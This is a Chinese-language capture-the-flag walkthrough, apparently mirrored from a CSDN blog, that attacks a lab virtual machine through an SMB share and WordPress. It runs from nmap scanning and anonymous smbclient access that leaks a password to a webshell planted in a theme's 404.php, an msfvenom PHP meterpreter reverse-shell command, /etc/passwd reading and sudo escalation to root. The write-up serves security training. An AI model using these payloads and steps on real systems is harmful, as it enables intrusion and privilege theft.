码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CTF-SMB信息泄露【简单易懂】


    目录

     SMB介绍

    实验环境

    信息探测

    分析探测结果

    针对SMB协议弱点分析

    1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

    2.针对SMB协议远程溢出漏洞进行分析

    针对http协议弱点分析

    1.浏览器查看网站

    2.使用dirb nikto探测

    3.寻找突破点,目标登录后台,上传webshell

    4.优化终端

    5.查找用户名:cat /etc/passwd

    6.查找密码:在共享目录下的敏感文件,提升权限


     SMB介绍

    SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

    SMB协议,计算机可以访问网络资源,下载对应的资源文件

    实验环境

    kali 192.168.20.128

    靶机 192.168.20.129

    链接:https://pan.baidu.com/s/1inGR9A628icBnqcsHCnPYQ 
    提取码:4c5l 

    信息探测

    nmap -sV ip 挖掘开放服务信息

    nmap -A -v -T4 挖掘靶场全部信息

    nmap -sV 192.168.20.129

    分析探测结果

    每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口

    针对特殊端口进行探测,尤其对开发大端口的http服务进行排查

    针对SMB协议弱点分析

    1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

    smbclient -L ip

    smbclient '\\ip\share$'

    print$和IPC$没有什么利用价值

    get 敏感文件

    发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)

    远程登录3306端口不行

    远程登录22端口不行

    2.针对SMB协议远程溢出漏洞进行分析

    searchsploit samba版本号

    发现没有远程溢出漏洞

    针对http协议弱点分析

    1.浏览器查看网站

    2.使用dirb nikto探测

    打开查看

    利用密码登录

    登陆网站

    3.寻找突破点,目标登录后台,上传webshell

    制作webshell

    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw

    制作webshell.php

    启动监听

    上传webshell

    update file

    获取反弹shell

    选择twentyfifteen的原因

    http://192.168.20.129/wordpress/wp-content/themes/twentyfifteen/404.php

      

    4.优化终端

    python -c "import pty;pty.spawn('/bin/bash')"

    5.查找用户名:cat /etc/passwd

    6.查找密码:在共享目录下的敏感文件,提升权限

    su 用户名

    12345是之前deets.txt文件里的密码

    sudo-l

    sudo su

    查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)

  • 相关阅读:
    最小二乘法的实现与线性回归的应用
    基于 elementUI / elementUI plus,实现 主要色(主题色)的一件换色(换肤)
    SHELL (bash)编程记录
    从 CPU 讲起,深入理解 Java 内存模型!
    自然语言处理 - 字词嵌入
    Java终止线程的三种方式
    Flutter 中的 Table 小部件:全面指南
    Javascript享元模式
    Bert和LSTM:情绪分类中的表现
    如何批量查询搜狗收录?提升搜狗收录8个方法介绍
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/126385930
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号